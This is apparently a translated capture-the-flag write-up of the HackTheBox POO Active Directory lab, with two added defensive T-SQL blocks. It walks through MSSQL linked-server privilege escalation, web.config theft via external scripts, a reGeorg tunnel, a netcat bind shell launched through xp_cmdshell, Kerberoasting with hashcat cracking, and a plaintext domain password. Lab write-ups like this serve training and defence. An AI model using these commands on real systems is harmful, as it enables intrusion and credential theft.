In this article we will walk through not just a single machine but an entire mini-lab from the site.
As stated in its description, POO is designed to test skills across all stages of an attack in a small Active Directory environment. The goal is to compromise the available host, escalate privileges, and ultimately compromise the entire domain, collecting 5 flags along the way.
The lab is reached over VPN. It is recommended not to connect from a work computer or from a host holding data that matters to you, since you are joining a private network with people who know a thing or two about information security.
Organizational information
To keep up with new articles, software and other information, I have created
All information is provided for educational purposes only. The author of this document takes no responsibility for any harm caused to anyone as a result of using the knowledge and methods obtained from studying this document.
Intro
This endgame consists of two machines and contains 5 flags.
A description and the address of the available host are also provided.
Let's begin!
Recon flag
This machine has the IP address 10.13.38.11, which I add to /etc/hosts.
10.13.38.11 poo.htb
The first step is to scan the open ports. Since scanning all ports with nmap takes a long time, I first do it with masscan. We scan all TCP and UDP ports via the tun0 interface at 500 packets per second.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Now, to get more detailed information about the services running on these ports, let's run a scan with the -A option.
nmap -A poo.htb -p80,1433
So we have IIS and MSSQL services. From this we learn the real DNS name of the domain and of the computer. On the web server we are greeted by the default IIS home page.
Let's enumerate directories. For this I use gobuster. In the parameters we specify the number of threads (-t 128), the URL (-u), the wordlist (-w) and the extensions we are interested in (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
So we have HTTP authentication on the /admin directory, as well as an exposed .DS_Store (Desktop Services Store) file. .DS_Store files hold a user's custom settings for a folder, such as the list of files, icon positions and the chosen background image. Such a file can end up in a web server directory along with a web developer's files, and since it lists the folder's contents, it reveals the names of files and directories. To extract this information you can use
python3 dsstore_crawler.py -i http://poo.htb/
We get the directory contents. The most interesting item here is the /dev directory, in which we can see the source and db files of two branches. But we can also learn the first 6 characters of file and directory names if the service is vulnerable to IIS short-name disclosure. You can check for this vulnerability using
And we find one text file starting with "poo_co". Not knowing what to do next, I simply selected from the directory wordlist all the words starting with "co".
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
And enumerate with wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
And we find the right word! We look at this file and save the credentials (judging by the DBNAME parameter, they are for MSSQL).
We hand in the flag, and our progress is 20%.
Huh flag
We connect to MSSQL; I use DBeaver.
We find nothing interesting in this database, so let's open an SQL editor and check which users exist.
SELECT name FROM master..syslogins;
We have two users. Let's check our privileges.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
So we have no privileges. Let's look at the linked servers; I have written about this technique in detail
SELECT * FROM master..sysservers;
So we find another SQL Server. Let's check query execution on this server using openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
We can even build a whole tree of queries.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
The point is that when we send a query to a linked server, the query is executed in the context of another user! Let's see which user context we are running in on the linked server.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
And now let's see in which context a query coming back to us from the linked server is executed!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
So it is the DBO context, which should have all privileges. Let's check the privileges in the case of a query coming from the linked server.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
As you can see, we have all privileges! Let's create our own admin this way. But openquery does not allow such statements, so let's do it with EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
And now we connect with the new user's credentials and observe the new flag database.
We hand in this flag and move on.
Backtrack flag
Let's get a shell through MSSQL; I use mssqlclient from the impacket package.
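From the defender's side, the condition abused in this section is a linked-server login mapping whose remote login is sysadmin on the target, combined with the 'rpc out' option that EXECUTE ... AT needs. The following T-SQL is an added example, not code from the original write-up: it lists the login mappings of every linked server, checks the mapped login's role on the remote instance, and shows a least-privilege replacement. The linked server name comes from the write-up; the logins reporting_user and linked_reader and the password are assumed placeholders.

```sql
-- Added example, not part of the original write-up.
-- 1. Audit: how does each linked server map local logins to remote logins?
--    local_principal_id = 0 is the catch-all row that applies to every login
--    not explicitly mapped; uses_self_credential = 1 forwards the caller's
--    own credentials, otherwise remote_name is the fixed remote login used.
SELECT  s.name                                 AS linked_server,
        s.data_source,
        COALESCE(p.name, '<all other logins>') AS local_login,
        l.uses_self_credential,
        l.remote_name,
        s.is_rpc_out_enabled                    -- needed for EXECUTE ... AT
FROM    sys.servers s
JOIN    sys.linked_logins l        ON l.server_id = s.server_id
LEFT JOIN sys.server_principals p  ON p.principal_id = l.local_principal_id
WHERE   s.is_linked = 1
ORDER BY s.name, local_login;

-- 2. On the REMOTE instance, check the role of the login that remote_name
--    points at. A sysadmin result here is the escalation shown above.
--    'linked_reader' is an assumed login name.
SELECT  name,
        IS_SRVROLEMEMBER('sysadmin', name)      AS is_sysadmin,
        IS_SRVROLEMEMBER('securityadmin', name) AS is_securityadmin
FROM    sys.server_principals
WHERE   name = 'linked_reader';

-- 3. Remediation on the LOCAL instance: drop the catch-all mapping so that
--    unmapped logins get no remote access at all, map only the logins that
--    need the link to a low-privilege remote login, and disable rpc out
--    unless remote procedure calls through the link are actually required.
EXEC sp_droplinkedsrvlogin @rmtsrvname = 'COMPATIBILITYPOO_PUBLIC',
                           @locallogin = NULL;                -- NULL = default row
EXEC sp_addlinkedsrvlogin  @rmtsrvname  = 'COMPATIBILITYPOO_PUBLIC',
                           @useself     = 'FALSE',
                           @locallogin  = 'reporting_user',   -- assumed local login
                           @rmtuser     = 'linked_reader',    -- assumed remote login
                           @rmtpassword = '<strong-password-placeholder>';
EXEC sp_serveroption @server   = 'COMPATIBILITYPOO_PUBLIC',
                     @optname  = 'rpc out',
                     @optvalue = 'false';
```

Run step 2 on the remote instance, not through the link, since a query sent through the link would itself run as the mapped login.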
mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC
We need to get a password, and the first thing we came across earlier was the site. So we need the web server configuration (dropping a convenient shell is not possible; apparently a firewall is running).
But access is denied. Although we can read the file through MSSQL, we first need to find out which programming languages are configured. In the MSSQL directory we find that Python is present.
Then reading the web.config file is no problem.
EXEC sp_execute_external_script
    @language = N'Python',
    @script = N'print(open("C:\\inetpub\\wwwroot\\web.config").read())';
Having obtained the credentials, go to /admin and pick up the flag.
Foothold flag
In fact, the firewall causes some trouble here, but when we look at the network settings we find that IPv6 is also in use!
Add this address to /etc/hosts.
dead:babe::1001 poo6.htb
Let's scan the host again, but this time over IPv6.
And the WinRM service is reachable over IPv6. Let's connect with the credentials we found.
The flag is on the desktop; hand it in.
P00ned flag
After reconnaissance on the host with
setspn.exe -T intranet.poo -Q */*
Let's run the command via MSSQL.
This way we obtain SPNs for the users p00_hr and p00_adm, which means they are susceptible to an attack such as Kerberoasting. In short, we can obtain their password hashes.
First you need to get a stable shell as the MSSQL service user. But since our access is limited, we only have a connection to the host through ports 80 and 1433. Still, it is possible to tunnel traffic through port 80! For this we use
But when we try to access it, we get a 404 error. This means that *.aspx files are not executed. To run files with this extension, install ASP.NET 4.5 as follows.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
And now, when accessing tunnel.aspx, we get the response that everything is ready to go.
Let's launch the client part of the application, which will forward the traffic. We will forward all traffic from port 5432 to the server.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
And we use proxychains to route any application's traffic through our proxy. Let's add this proxy to the /etc/proxychains.conf configuration file.
Now let's upload the program to the server
Now, through MSSQL, we start the listener.
xp_cmdshell 'C:\temp\nc64.exe -e powershell.exe -lvp 4321'
And we can connect through our proxy.
proxychains rlwrap nc poo.htb 4321
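Both execution paths used in this write-up, sp_execute_external_script for reading web.config and xp_cmdshell for launching the listener, depend on server-level options that are off by default. The following T-SQL is an added example, not code from the original write-up: it checks and disables those options, lists who holds the external-script permission, and records any remaining use of either procedure with an Extended Events session (the session and file names are assumed).

```sql
-- Added example, not part of the original write-up.
-- 1. Which execution surfaces are switched on? Both are "advanced options",
--    so they only show up after 'show advanced options' is enabled.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('external scripts enabled', 'xp_cmdshell', 'Ole Automation Procedures');

-- 2. Who may call external scripts in this database at all? Without this
--    permission sp_execute_external_script fails even when the option is on.
SELECT pr.name AS grantee, pe.permission_name, pe.state_desc
FROM   sys.database_permissions pe
JOIN   sys.database_principals pr ON pr.principal_id = pe.grantee_principal_id
WHERE  pe.permission_name = 'EXECUTE ANY EXTERNAL SCRIPT';

-- 3. Remediation: switch both off unless a documented workload needs them.
--    Compare value with value_in_use afterwards; depending on the version,
--    'external scripts enabled' only takes effect after a service restart.
EXEC sp_configure 'external scripts enabled', 0;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- 4. Detection: keep a record of every call to either procedure, whether it
--    arrives as an RPC or inside an ad-hoc batch, with the caller's login
--    and host. Session and file names are assumed.
CREATE EVENT SESSION exec_surface_watch ON SERVER
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname,
            sqlserver.sql_text)
    WHERE (object_name = N'xp_cmdshell'
        OR object_name = N'sp_execute_external_script')),
ADD EVENT sqlserver.sql_statement_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname)
    WHERE (sqlserver.like_i_sql_unicode_string(statement, N'%xp_cmdshell%')
        OR sqlserver.like_i_sql_unicode_string(statement, N'%sp_execute_external_script%')))
ADD TARGET package0.event_file (SET filename = N'exec_surface_watch.xel');
ALTER EVENT SESSION exec_surface_watch ON SERVER STATE = START;
```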
And we obtain the hashes.
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Next, these hashes need to be cracked. Since rockyou did not contain the passwords, I used ALL the password wordlists shipped with SecLists. We use hashcat for cracking.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
And we recover both passwords: the first from the dutch_passwordlist.txt wordlist and the second from Keyboard-Combinations.txt.
So now we have three users, and we head for the domain controller. First let's find out its address.
Great, we have learned the domain controller's IP address. Let's find out all the domain users, as well as which of them is an administrator. To gather this information, download the PowerView.ps1 script. Then we connect using evil-winrm, specifying the directory containing the script in the -s parameter. After that, simply load the PowerView script.
Now all of its functions are available to us. The user p00_adm looks like a privileged user, so we will work in its context. Let's create a PSCredential object.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Now every PowerShell command in which we specify Creds will be executed on behalf of p00_adm. Let's list the users along with the AdminCount attribute.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
So our user is indeed privileged. Let's see which groups it belongs to.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
We finally confirm that the user is a site administrator. This grants the right to log in remotely to the domain controller. Let's try to log in via WinRM through our tunnel. I was confused by the errors reGeorg produced when used with evil-winrm.
So we use a different, simpler one
We try to connect, and we are in the system.
But there is no flag. Then we look at the users and check their desktops.
And on mr3ks's desktop we find the flag, and the lab is 100% complete.
That's all. As feedback, leave a comment on whether you learned anything new from this article and whether it was useful to you.
You can join us
Source: www.habr.com